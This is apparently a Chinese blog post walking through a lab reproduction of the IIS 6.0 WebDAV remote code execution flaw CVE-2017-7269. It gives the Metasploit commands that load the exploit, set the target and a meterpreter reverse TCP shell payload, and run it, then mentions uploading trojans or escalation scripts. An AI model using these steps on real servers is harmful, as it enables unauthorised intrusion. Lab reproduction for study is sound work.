CVE

iis6.0远程代码执行漏洞复现(CVE-2017-7269)

道锋潜鳞
2020-03-31 / 0 评论 / 263 阅读 / 正在检测是否收录...

一.实验环境搭建

1.目标机:windows server 2003 r2

需要目标服务器开启WebDAV


靶机IP:192.168.75.134

Kali IP : 192.168.75.129

kali中启动Msf,使用CVE-2017-7269攻击插件

use exploit/windows/iis/cve_2017_7269

没有这个插件的老铁,还麻烦您 在https://github.com/zcgonvh/cve-2017-7269 下载脚本,并且 把exp 复制到攻击机器的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下,然后reload_all进行启用

使用show options查看相关攻击参数

set RHOSTS 192.168.75.134

set HttpHost 192.168.75.134

设置返回载荷

set payload windows/meterpreter/reverse_tcp

使用exploit 或者run进行攻击

获取到连接

输入shell命令,来到了我们所熟悉的界面

查看当前用户权限,whoami

普通权限,但是可以通过msf的上传功能传递木马或者提权脚本

0

评论 (0)

取消